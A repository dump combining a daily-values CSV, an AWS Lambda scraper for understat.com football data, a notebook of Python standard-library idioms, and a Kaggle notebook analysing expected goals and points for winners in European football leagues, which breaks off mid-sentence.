01/04/2022,200 34 | 02/04/2022,100 35 | 03/04/2022,200 36 | 04/04/2022,300 37 | 05/04/2022,200 38 | 06/04/2022,100 39 | 07/04/2022,300 40 | 08/04/2022,100 41 | 09/04/2022,100 42 | 10/04/2022,200 43 | 11/04/2022,200 44 | 12/04/2022,100 45 | 13/04/2022,200 46 | 14/04/2022,100 47 | 15/04/2022,100 48 | 16/04/2022,100 49 | 17/04/2022,200 50 | 18/04/2022,300 51 | 19/04/2022,200 52 | 20/04/2022,100 53 | 21/04/2022,100 54 | 22/04/2022,200 55 | 23/04/2022,400 56 | 24/04/2022,200 57 | 25/04/2022,100 58 | 26/04/2022,200 59 | 27/04/2022,300 60 | 28/04/2022,400 61 | 29/04/2022,200 62 | 30/04/2022,200 63 | 01/05/2022,300 64 | 02/05/2022,300 65 | 03/05/2022,400 66 | 04/05/2022,300 67 | 05/05/2022,200 68 | 06/05/2022,200 69 | 07/05/2022,200 70 | 08/05/2022,400 71 | 09/05/2022,150 72 | 10/05/2022,350 73 | 11/05/2022,350 74 | 12/05/2022,300 75 | 13/05/2022,250 76 | 14/05/2022,300 77 | 15/05/2022,200 78 | 16/05/2022,300 79 | 17/05/2022,200 80 | 18/05/2022,400 81 | 19/05/2022,200 82 | 20/05/2022,200 83 | 21/05/2022,150 84 | 22/05/2022,200 85 | 23/05/2022,150 86 | 24/05/2022,150 87 | 25/05/2022,100 88 | 26/05/2022,150 89 | 27/05/2022,150 90 | 28/05/2022,250 91 | 29/05/2022,150 92 | 30/05/2022,200 93 | 31/05/2022,150 94 | 01/06/2022,200 95 | 02/06/2022,150 96 | 03/06/2022,100 97 | 04/06/2022,100 98 | 05/06/2022,100 99 | 06/06/2022,100 100 | 07/06/2022,110 101 | 08/06/2022,140 102 | 09/06/2022,200 103 | 10/06/2022,200 104 | 11/06/2022,150 105 | 12/06/2022,100 106 | 13/06/2022,150 107 | 14/06/2022,200 108 | 15/06/2022,250 109 | 16/06/2022,200 110 | 17/06/2022,200 111 | 18/06/2022,200 112 | 19/06/2022,250 113 | 20/06/2022,200 114 | 21/06/2022,300 115 | 22/06/2022,130 116 | 23/06/2022,200 117 | 24/06/2022,100 118 | 25/06/2022,170 119 | 26/06/2022,150 120 | 27/06/2022,150 121 | 28/06/2022,250 122 | 29/06/2022,200 123 | 30/06/2022,150 124 | 01/07/2022,150 125 | 02/07/2022,120 126 | 03/07/2022,100 127 | 04/07/2022,230 128 | 05/07/2022,150 129 | 06/07/2022,150 130 | 07/07/2022,150 131 | 08/07/2022,250 132 | 09/07/2022,300 133 | 10/07/2022,100 134 | 11/07/2022,100 135 | 12/07/2022,70 136 | 13/07/2022,100 137 | 14/07/2022,300 138 | 15/07/2022,130 139 | 16/07/2022,140 140 | 17/07/2022,160 141 | 18/07/2022,150 142 | 19/07/2022,100 143 | 20/07/2022,200 144 | 21/07/2022,100 145 | 22/07/2022,150 146 | 23/07/2022,240 147 | 24/07/2022,280 148 | 25/07/2022,180 149 | 26/07/2022,170 150 | 27/07/2022,200 151 | 28/07/2022,160 152 | 29/07/2022,270 153 | 30/07/2022,170 154 | 31/07/2022,160 155 | 01/08/2022,200 156 | 02/08/2022,140 157 | 03/08/2022,180 158 | 04/08/2022,150 159 | 05/08/2022,150 160 | 06/08/2022,250 161 | 07/08/2022,300 162 | 08/08/2022,140 163 | 09/08/2022,300 164 | 10/08/2022,160 165 | 11/08/2022,200 166 | 12/08/2022,200 167 | 13/08/2022,200 168 | 14/08/2022,150 169 | 15/08/2022,200 170 | 16/08/2022,150 171 | 17/08/2022,200 172 | 18/08/2022,200 173 | 19/08/2022,400 174 | 20/08/2022,200 175 | 21/08/2022,300 176 | 22/08/2022,200 177 | 23/08/2022,150 178 | 24/08/2022,150 179 | 25/08/2022,150 180 | 26/08/2022,400 181 | 27/08/2022,250 182 | 28/08/2022,250 183 | 29/08/2022,350 184 | 30/08/2022,450 185 | 31/08/2022,350 186 | 01/09/2022,450 187 | 02/09/2022,350 188 | 03/09/2022,350 189 | 04/09/2022,450 190 | 05/09/2022,300 191 | 06/09/2022,350 192 | 07/09/2022,460 193 | 08/09/2022,640 194 | 09/09/2022,650 195 | 10/09/2022,350 196 | 11/09/2022,400 197 | 12/09/2022,300 198 | 13/09/2022,350 199 | 14/09/2022,350 200 | 15/09/2022,200 201 | 16/09/2022,200 202 | 17/09/2022,200 203 | 18/09/2022,230 204 | 19/09/2022,170 205 | 20/09/2022,160 206 | 21/09/2022,300 207 | 22/09/2022,400 208 | 23/09/2022,550 209 | 24/09/2022,240 210 | 25/09/2022,400 211 | 26/09/2022,500 212 | 27/09/2022,550 213 | 28/09/2022,400 214 | 29/09/2022,430 215 | 30/09/2022,500 216 | 01/10/2022,530 217 | 02/10/2022,500 218 | 03/10/2022,320 219 | 04/10/2022,370 220 | 05/10/2022,200 221 | 06/10/2022,330 222 | 07/10/2022,350 223 | 08/10/2022,380 224 | 09/10/2022,440 225 | 10/10/2022,370 226 | 11/10/2022,240 227 | 12/10/2022,270 228 | 13/10/2022,420 229 | 14/10/2022,500 230 | 15/10/2022,400 231 | 16/10/2022,300 232 | 17/10/2022,320 233 | 18/10/2022,530 234 | 19/10/2022,430 235 | 20/10/2022,370 236 | 21/10/2022,100 237 | 22/10/2022,320 238 | 23/10/2022,400 239 | 24/10/2022,470 240 | 25/10/2022,480 241 | 26/10/2022,480 242 | 27/10/2022,320 243 | 28/10/2022,480 244 | 29/10/2022,550 245 | 30/10/2022,950 246 | 31/10/2022,620 247 | 01/11/2022,650 248 | 02/11/2022,800 249 | 03/11/2022,730 250 | 04/11/2022,840 251 | 05/11/2022,600 252 | 06/11/2022,490 -------------------------------------------------------------------------------- /lambda_web_scraper.py: -------------------------------------------------------------------------------- 1 | import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) 2 | import requests 3 | from bs4 import BeautifulSoup 4 | import json 5 | import boto3 6 | import logging 7 | 8 | logger = logging.getLogger() 9 | logger.setLevel(logging.INFO) 10 | 11 | # create urls for all SEASONS of all LEAGUES 12 | BASE_URL = 'https://understat.com/league' 13 | LEAGUES = ['La_liga', 'EPL', 'Bundesliga', 'Serie_A', 'Ligue_1'] 14 | SEASONS = ['2014', '2015', '2016', '2017', '2018', '2019', '2020', '2021'] 15 | # SEASONS = ['2021'] 16 | 17 | 18 | def get_teams_data(data): 19 | # Get teams and their relevant ids and put them into separate dictionary 20 | teams = {} 21 | for id in data.keys(): 22 | teams[id] = data[id]['title'] 23 | 24 | # EDA to get a feeling of how the JSON is structured 25 | # Column names are all the same, so we just use first element 26 | columns = [] 27 | # Check the sample of values per each column 28 | values = [] 29 | for id in data.keys(): 30 | columns = list(data[id]['history'][0].keys()) 31 | values = list(data[id]['history'][0].values()) 32 | break 33 | 34 | # Getting data for all teams 35 | dataframes = {} 36 | for id, team in teams.items(): 37 | teams_data = [] 38 | for row in data[id]['history']: 39 | teams_data.append(list(row.values())) 40 | 41 | df = pd.DataFrame(teams_data, columns=columns) 42 | dataframes[team] = df 43 | # print('Added data for {}.'.format(team)) 44 | 45 | return dataframes 46 | 47 | 48 | def get_data_from_web(league, season): 49 | url = BASE_URL+'/'+league+'/'+season 50 | logger.info("Scraping " + url) 51 | res = requests.get(url) 52 | soup = BeautifulSoup(res.content, "lxml") 53 | 54 | # Based on the structure of the webpage, I found that data is in the JSON variable, under 11 | 14 | 15 | 16 | 17 |
18 |
19 |
20 | 21 | 24 | 59 | 60 | -------------------------------------------------------------------------------- /data_manipulation_with_standard_lib.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 1, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "PATH_TO_FILE = 'data/cart.csv'" 10 | ] 11 | }, 12 | { 13 | "cell_type": "code", 14 | "execution_count": null, 15 | "metadata": {}, 16 | "outputs": [], 17 | "source": [ 18 | "def do_something_with():\n", 19 | " pass\n", 20 | "\n", 21 | "l = ['Twitter', 'Instagram', 'Snapchat', 'TikTok']\n", 22 | "# Instead of\n", 23 | "i = 0\n", 24 | "for s in l:\n", 25 | " do_something_with(i, s)\n", 26 | " i += 1\n", 27 | "\n", 28 | "# Use\n", 29 | "for i, s in enumerate(l):\n", 30 | " do_something_with(i, s)\n", 31 | "\n", 32 | "# less verbose and even slightly faster" 33 | ] 34 | }, 35 | { 36 | "cell_type": "code", 37 | "execution_count": 8, 38 | "metadata": {}, 39 | "outputs": [ 40 | { 41 | "name": "stdout", 42 | "output_type": "stream", 43 | "text": [ 44 | "1 ['t-shirt', 'black', 'top', '20', '1']\n", 45 | "2 ['pants', 'white', 'bottom', '50', '1']\n", 46 | "3 ['blazer', 'yellow', 'top', '100', '1']\n", 47 | "4 ['t-shirt', 'red', 'top', '15', '2']\n", 48 | "5 ['t-shirt', 'orange', 'top', '25', '1']\n", 49 | "6 ['sneakers', 'white', 'footwear', '100', '1']\n", 50 | "7 ['bracelet', 'green', 'accesories', '5', '3']\n" 51 | ] 52 | } 53 | ], 54 | "source": [ 55 | "import csv\n", 56 | "\n", 57 | "with open(PATH_TO_FILE, 'r') as f:\n", 58 | " rows = csv.reader(f, delimiter=',', quotechar='\"', escapechar=\"\\\\\")\n", 59 | " headers = next(rows)\n", 60 | " for line, row in enumerate(rows, start=1):\n", 61 | " print(line, row)" 62 | ] 63 | }, 64 | { 65 | "cell_type": "code", 66 | "execution_count": 6, 67 | "metadata": {}, 68 | "outputs": [ 69 | { 70 | "data": { 71 | "text/plain": [ 72 | "55" 73 | ] 74 | }, 75 | "execution_count": 6, 76 | "metadata": {}, 77 | "output_type": "execute_result" 78 | } 79 | ], 80 | "source": [ 81 | "shopping_cart = [\n", 82 | " ('t-shirt', 15, 1),\n", 83 | " ('pants', 50, 1),\n", 84 | " ('t-shirt', 20, 2),\n", 85 | " ('socks', 10, 1),\n", 86 | " ('jacket', 100, 1),\n", 87 | " ('socks', 5, 1)\n", 88 | "]\n", 89 | "\n", 90 | "from collections import Counter\n", 91 | "total_clothes = Counter()\n", 92 | "for item, price, quantity in shopping_cart:\n", 93 | " total_clothes[item] += price*quantity\n", 94 | "\n", 95 | "total_clothes['t-shirt']\n", 96 | "# >>> 55\n", 97 | "\n", 98 | "# This won't work\n", 99 | "total_clothes = {}\n", 100 | "for item, price, quantity in shopping_cart:\n", 101 | " total_clothes[item] += price*quantity\n", 102 | "\n", 103 | "total_clothes['t-shirt']\n", 104 | "# >>> KeyError: 't-shirt'\n", 105 | "\n", 106 | "# In order to make it work with dictionary:\n", 107 | "total_clothes = {}\n", 108 | "for item, price, quantity in shopping_cart:\n", 109 | " if item in total_clothes.keys():\n", 110 | " total_clothes[item] += price*quantity\n", 111 | " else:\n", 112 | " total_clothes[item] = price*quantity\n", 113 | "\n", 114 | "total_clothes['t-shirt']\n", 115 | "# >>> 55" 116 | ] 117 | }, 118 | { 119 | "cell_type": "code", 120 | "execution_count": 20, 121 | "metadata": {}, 122 | "outputs": [ 123 | { 124 | "data": { 125 | "text/plain": [ 126 | "Counter({'t-shirt': 55, 'pants': 50, 'socks': 15, 'jacket': 100})" 127 | ] 128 | }, 129 | "execution_count": 20, 130 | "metadata": {}, 131 | "output_type": "execute_result" 132 | } 133 | ], 134 | "source": [ 135 | "shopping_cart = [\n", 136 | " ('t-shirt', 15, 1),\n", 137 | " ('pants', 50, 1),\n", 138 | " ('t-shirt', 20, 2),\n", 139 | " ('socks', 10, 1),\n", 140 | " ('jacket', 100, 1),\n", 141 | " ('socks', 5, 1)\n", 142 | "]\n", 143 | "\n", 144 | "from collections import Counter\n", 145 | "total_clothes = Counter()\n", 146 | "for item, price, quantity in shopping_cart:\n", 147 | " total_clothes[item] += price*quantity\n", 148 | "\n", 149 | "total_clothes" 150 | ] 151 | }, 152 | { 153 | "cell_type": "code", 154 | "execution_count": 4, 155 | "metadata": {}, 156 | "outputs": [ 157 | { 158 | "data": { 159 | "text/plain": [ 160 | "[('the', 786),\n", 161 | " ('I', 622),\n", 162 | " ('and', 591),\n", 163 | " ('of', 446),\n", 164 | " ('to', 429),\n", 165 | " ('my', 402),\n", 166 | " ('you', 400),\n", 167 | " ('a', 353),\n", 168 | " ('in', 266),\n", 169 | " ('not', 265),\n", 170 | " ('that', 249),\n", 171 | " ('KING', 243),\n", 172 | " ('LEAR', 236),\n", 173 | " ('me', 227),\n", 174 | " ('your', 205),\n", 175 | " ('him', 197),\n", 176 | " ('have', 193),\n", 177 | " ('his', 193),\n", 178 | " ('is', 192),\n", 179 | " ('this', 185)]" 180 | ] 181 | }, 182 | "execution_count": 4, 183 | "metadata": {}, 184 | "output_type": "execute_result" 185 | } 186 | ], 187 | "source": [ 188 | "from collections import Counter\n", 189 | "import string\n", 190 | "\n", 191 | "with open('data/kinglear.txt', 'r') as f:\n", 192 | " count_words = Counter()\n", 193 | " for line in f:\n", 194 | " line = line.translate(str.maketrans('', '', string.punctuation))\n", 195 | " words = line.split()\n", 196 | " words_per_line = Counter(words)\n", 197 | " count_words += words_per_line\n", 198 | "\n", 199 | "count_words.most_common(20)" 200 | ] 201 | }, 202 | { 203 | "cell_type": "code", 204 | "execution_count": 11, 205 | "metadata": {}, 206 | "outputs": [ 207 | { 208 | "data": { 209 | "text/plain": [ 210 | "[(15, 1), (20, 2)]" 211 | ] 212 | }, 213 | "execution_count": 11, 214 | "metadata": {}, 215 | "output_type": "execute_result" 216 | } 217 | ], 218 | "source": [ 219 | "shopping_cart = [\n", 220 | " ('t-shirt', 15, 1),\n", 221 | " ('pants', 50, 1),\n", 222 | " ('t-shirt', 20, 2),\n", 223 | " ('socks', 10, 1),\n", 224 | " ('jacket', 100, 1),\n", 225 | " ('socks', 5, 1)\n", 226 | "]\n", 227 | "\n", 228 | "from collections import defaultdict\n", 229 | "total_clothes = defaultdict(list)\n", 230 | "for item, price, quantity in shopping_cart:\n", 231 | " total_clothes[item].append((price, quantity))\n", 232 | "\n", 233 | "total_clothes['t-shirt']\n", 234 | "# >>> [(15, 1), (20, 2)]\n", 235 | "\n", 236 | "\n", 237 | "# total_clothes = {}\n", 238 | "# for item, price, quantity in shopping_cart:\n", 239 | "# total_clothes[item].append((price, quantity))\n", 240 | "# >>> KeyError: 't-shirt'" 241 | ] 242 | }, 243 | { 244 | "cell_type": "code", 245 | "execution_count": 15, 246 | "metadata": {}, 247 | "outputs": [ 248 | { 249 | "data": { 250 | "text/plain": [ 251 | "defaultdict(int, {'t-shirt': 55, 'pants': 50, 'socks': 15, 'jacket': 100})" 252 | ] 253 | }, 254 | "execution_count": 15, 255 | "metadata": {}, 256 | "output_type": "execute_result" 257 | } 258 | ], 259 | "source": [ 260 | "shopping_cart = [\n", 261 | " ('t-shirt', 15, 1),\n", 262 | " ('pants', 50, 1),\n", 263 | " ('t-shirt', 20, 2),\n", 264 | " ('socks', 10, 1),\n", 265 | " ('jacket', 100, 1),\n", 266 | " ('socks', 5, 1)\n", 267 | "]\n", 268 | "\n", 269 | "from collections import defaultdict\n", 270 | "total_clothes = defaultdict(int)\n", 271 | "for item, price, quantity in shopping_cart:\n", 272 | " total_clothes[item] += price*quantity\n", 273 | "\n", 274 | "total_clothes" 275 | ] 276 | }, 277 | { 278 | "cell_type": "code", 279 | "execution_count": 16, 280 | "metadata": {}, 281 | "outputs": [ 282 | { 283 | "data": { 284 | "text/plain": [ 285 | "[('jacket', 100), ('t-shirt', 55), ('pants', 50)]" 286 | ] 287 | }, 288 | "execution_count": 16, 289 | "metadata": {}, 290 | "output_type": "execute_result" 291 | } 292 | ], 293 | "source": [ 294 | "shopping_cart = [\n", 295 | " ('t-shirt', 15, 1),\n", 296 | " ('pants', 50, 1),\n", 297 | " ('t-shirt', 20, 2),\n", 298 | " ('socks', 10, 1),\n", 299 | " ('jacket', 100, 1),\n", 300 | " ('socks', 5, 1)\n", 301 | "]\n", 302 | "\n", 303 | "from collections import Counter\n", 304 | "total_clothes = Counter()\n", 305 | "for item, price, quantity in shopping_cart:\n", 306 | " total_clothes[item] += price*quantity\n", 307 | "\n", 308 | "total_clothes.most_common(3)" 309 | ] 310 | }, 311 | { 312 | "cell_type": "code", 313 | "execution_count": 18, 314 | "metadata": {}, 315 | "outputs": [ 316 | { 317 | "name": "stdout", 318 | "output_type": "stream", 319 | "text": [ 320 | "Last game result: 1\n", 321 | "Previous 5 games results: victories - 1 draws - 0 defeats - 0\n", 322 | "Last game result: X\n", 323 | "Previous 5 games results: victories - 1 draws - 1 defeats - 0\n", 324 | "Last game result: 1\n", 325 | "Previous 5 games results: victories - 2 draws - 1 defeats - 0\n", 326 | "Last game result: 2\n", 327 | "Previous 5 games results: victories - 1 draws - 1 defeats - 1\n", 328 | "Last game result: X\n", 329 | "Previous 5 games results: victories - 1 draws - 1 defeats - 1\n", 330 | "Last game result: 1\n", 331 | "Previous 5 games results: victories - 1 draws - 1 defeats - 1\n", 332 | "Last game result: 1\n", 333 | "Previous 5 games results: victories - 2 draws - 1 defeats - 0\n", 334 | "Last game result: 1\n", 335 | "Previous 5 games results: victories - 3 draws - 0 defeats - 0\n", 336 | "Last game result: 1\n", 337 | "Previous 5 games results: victories - 3 draws - 0 defeats - 0\n", 338 | "Last game result: X\n", 339 | "Previous 5 games results: victories - 2 draws - 1 defeats - 0\n", 340 | "Last game result: 1\n", 341 | "Previous 5 games results: victories - 2 draws - 1 defeats - 0\n" 342 | ] 343 | } 344 | ], 345 | "source": [ 346 | "from collections import deque, Counter\n", 347 | "import csv\n", 348 | "\n", 349 | "history = deque(maxlen=3)\n", 350 | "with open('data/results.csv', 'r') as f:\n", 351 | " lines = csv.reader(f)\n", 352 | " headers = next(lines)\n", 353 | " for line in lines:\n", 354 | " history.append(line)\n", 355 | " print('Last game result:', line[-1])\n", 356 | " last_results = Counter()\n", 357 | " for result in history:\n", 358 | " last_results[result[-1]] += 1\n", 359 | "\n", 360 | " print('Previous 5 games results: victories -', last_results['1'], 'draws -', last_results['X'], 'defeats -', last_results['2'])\n" 361 | ] 362 | } 363 | ], 364 | "metadata": { 365 | "kernelspec": { 366 | "display_name": "Python 3.8.10 ('venv': venv)", 367 | "language": "python", 368 | "name": "python3" 369 | }, 370 | "language_info": { 371 | "codemirror_mode": { 372 | "name": "ipython", 373 | "version": 3 374 | }, 375 | "file_extension": ".py", 376 | "mimetype": "text/x-python", 377 | "name": "python", 378 | "nbconvert_exporter": "python", 379 | "pygments_lexer": "ipython3", 380 | "version": "3.8.10" 381 | }, 382 | "orig_nbformat": 4, 383 | "vscode": { 384 | "interpreter": { 385 | "hash": "439571daf87331876600085d8386dc908c3f950474647915ed4fb6541957308b" 386 | } 387 | } 388 | }, 389 | "nbformat": 4, 390 | "nbformat_minor": 2 391 | } 392 | -------------------------------------------------------------------------------- /football_why_winners_win_and_losers_loose.ipynb: -------------------------------------------------------------------------------- 1 | {"cells":[{"metadata":{},"cell_type":"markdown","source":"# Exploring 5 Years of European Football"},{"metadata":{},"cell_type":"markdown","source":"# Intro\n\nIn this notebook we will explore modern metrics in football (xG, xGA and xPTS) and its' influence in sport analytics.\n\n* **Expected Goals (xG)** - measures the quality of a shot based on several variables such as assist type, shot angle and distance from goal, whether it was a headed shot and whether it was defined as a big chance.\n\n* **Expected Assits (xGA)** - measures the likelihood that a given pass will become a goal assist. It considers several factors including the type of pass, pass end-point and length of the pass.\n\n* **Expected Points (xPTS)** - measures the likelihood of a certaing game to bring points to the team.\n\nThese metrics let us look much deeper into football statistics and understand performance of players and teams in general and realize the role of luck and skill in it. Disclaimer: they are both important.\n\nThe process of data collection for this notebook is described in this Kaggle kernel: [Web Scraping Football Statistics](https://www.kaggle.com/slehkyi/web-scraping-football-statistics-2014-now)"},{"metadata":{"_uuid":"8f2839f25d086af736a60e9eeb907d3b93b6e0e5","_cell_guid":"b1076dfc-b9ad-4769-8c92-a6c4dae69d19","trusted":true},"cell_type":"code","source":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport collections\nimport warnings\n\nfrom IPython.core.display import display, HTML\n\n# import plotly \nimport plotly\nimport plotly.figure_factory as ff\nimport plotly.graph_objs as go\nimport plotly.offline as py\nfrom plotly.offline import iplot, init_notebook_mode\nimport plotly.tools as tls\n\n# configure things\nwarnings.filterwarnings('ignore')\n\npd.options.display.float_format = '{:,.2f}'.format \npd.options.display.max_columns = 999\n\npy.init_notebook_mode(connected=True)\n\n%load_ext autoreload\n%autoreload 2\n\n%matplotlib inline\nsns.set()\n\n# !pip install plotly --upgrade","execution_count":null,"outputs":[]},{"metadata":{"_cell_guid":"79c7e3d0-c299-4dcb-8224-4455121ee9b0","_uuid":"d629ff2d2480ee46fbb7e2d37f6b5fab8052498a","trusted":true},"cell_type":"code","source":"# # func to make plotly work in Collaboratory (not necessary on Kaggle)\n# def configure_plotly_browser_state():\n# import IPython\n# display(IPython.core.display.HTML('''\n# \n# \n# '''))","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Import Data and Visual EDA"},{"metadata":{"trusted":true},"cell_type":"code","source":"df = pd.read_csv('../input/understat.com.csv')\ndf = df.rename(index=int, columns={'Unnamed: 0': 'league', 'Unnamed: 1': 'year'}) \ndf.head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"In the next visualization we will check how many teams from each league were in top 4 during last 5 years. It can give us some info about stability of top teams from different countries."},{"metadata":{"trusted":true},"cell_type":"code","source":"f = plt.figure(figsize=(25,12))\nax = f.add_subplot(2,3,1)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'Bundesliga') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,2)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'EPL') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,3)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'La_liga') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,4)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'Serie_A') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,5)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'Ligue_1') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,6)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'RFPL') & (df['position'] <= 4)], ax=ax)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"As we can see from these bar charts, there are teams that in last 5 years were in top 4 only once, which means it is not something common, which means if we dig deeper, we can find that there is a factor of luck that might have played in favour to these teams. It's just a theory, so let's look closer to those outliers.\n\nThe teams that were in top 4 only once during last 5 seasons are:\n\n* Wolfsburg (2014) and Schalke 04 (2017) from Bundesliga\n* Leicester (2015) from EPL\n* Villareal (2015) and Sevilla (2016) from La Liga\n* Lazio (2014) and Fiorentina (2014) from Serie A\n* Lille (2018) and Saint-Etienne (2018) from Ligue 1\n* FC Rostov (2015) and Dinamo Moscow (2014) from RFPL\n\nLet's save these teams."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Removing unnecessary for our analysis columns \ndf_xg = df[['league', 'year', 'position', 'team', 'scored', 'xG', 'xG_diff', 'missed', 'xGA', 'xGA_diff', 'pts', 'xpts', 'xpts_diff']]\n\noutlier_teams = ['Wolfsburg', 'Schalke 04', 'Leicester', 'Villareal', 'Sevilla', 'Lazio', 'Fiorentina', 'Lille', 'Saint-Etienne', 'FC Rostov', 'Dinamo Moscow']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Checking if getting the first place requires fenomenal execution\nfirst_place = df_xg[df_xg['position'] == 1]\n\n# Get list of leagues\nleagues = df['league'].drop_duplicates()\nleagues = leagues.tolist()\n\n# Get list of years\nyears = df['year'].drop_duplicates()\nyears = years.tolist()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Understanding How Winners Win"},{"metadata":{},"cell_type":"markdown","source":"In this section we will try to find some patterns that can help us understand what are some of the ingredients of the victory soup :D. Starting with Bundesliga."},{"metadata":{},"cell_type":"markdown","source":"## Bundesliga"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'Bundesliga']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'Bundesliga'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'Bundesliga'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n barmode='group',\n title=\"Comparing Actual and Expected Points for Winner Team in Bundesliga\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"Points\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"By looking at the table and barchart we see that Bayern every year got more points that they should have, they scored more than expected and missed less than expected (except for 2018, which didn't break their plan of winning the season, but it gives some hints that Bayern played worse this year, although the competitors didn't take advantage of it). "},{"metadata":{"trusted":true},"cell_type":"code","source":"# and from this table we see that Bayern dominates here totally, even when they do not play well\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'Bundesliga')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## La Liga"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'La_liga']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'La_liga'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'La_liga'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n barmode='group',\n title=\"Comparing Actual and Expected Points for Winner Team in La Liga\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"Points\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"As we can see from the chart above that in 2014 and 2015 Barcelona was creating enough moments to win the title and do not rely on personal skills or luck, from these numbers we can actually say that THE Team was playing there.\n\nIn 2016 there were lots of competition between Madrid and Barcelona and in the end Madrid got luckier / had more guts in one particular game (or Barcelona got unlucky / didn't have balls) and it was the cost of the title. I am sure that if we dig deeper that season we can find that particular match.\n\nIn 2017 and 2018 Barcelona's success was mostly tributed to actions of Lionel Messi who was scoring or making assits in situations where normal players wouldn't do that. What led to such a jump in xPTS difference. What makes me think (having the context that Real Madrid is very active on transfer market this season) can end up bad. Just subjective opinion based on numbers and watching Barcelona games. Really hope I am wrong."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing with runner-up\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'La_liga')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## EPL"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'EPL']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'EPL'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'EPL'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n barmode='group',\n title=\"Comparing Actual and Expected Points for Winner Team in EPL\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"Points\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"In EPL we see the clear trend that tells you: \"To win you have to be better than statistics\". Interesting case here is Leicester story of victory in 2015: they got 12 points more than they should've and at the same time Arsenal got 6 points less of expected! This is why we love football, because such unexplicable things happen. I am not telling is total luck, but it played its' role here.\n\nAnother interesting thing is Manchester City of 2018 - they are super stable! They scored just one goal more than expected, missed 2 less and got 7 additional points, while Liverpool fought really well, had little bit more luck on their side, but couldn't win despite being 13 points ahead of their expected.\n\nPep is finishing building the machine of destruction. Man City creates and converts their moments based on skill and do not rely on luck - it makes them very dangerous in the next season."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing with runner-ups\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'EPL')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## Ligue 1"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'Ligue_1']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'Ligue_1'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'Ligue_1'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n barmode='group',\n title=\"Comparing Actual and Expected Points for Winner Team in Ligue 1\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"Points\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"In French Ligue 1 we continue to see the trend \"to win you have to execute 110%, because 100% is not enough\". Here Paris Saint Germain dominates totally. Only in 2016 we get an outlier in the face of Monaco that scored 30 goals more than expected!!! and got almost 17 points more than 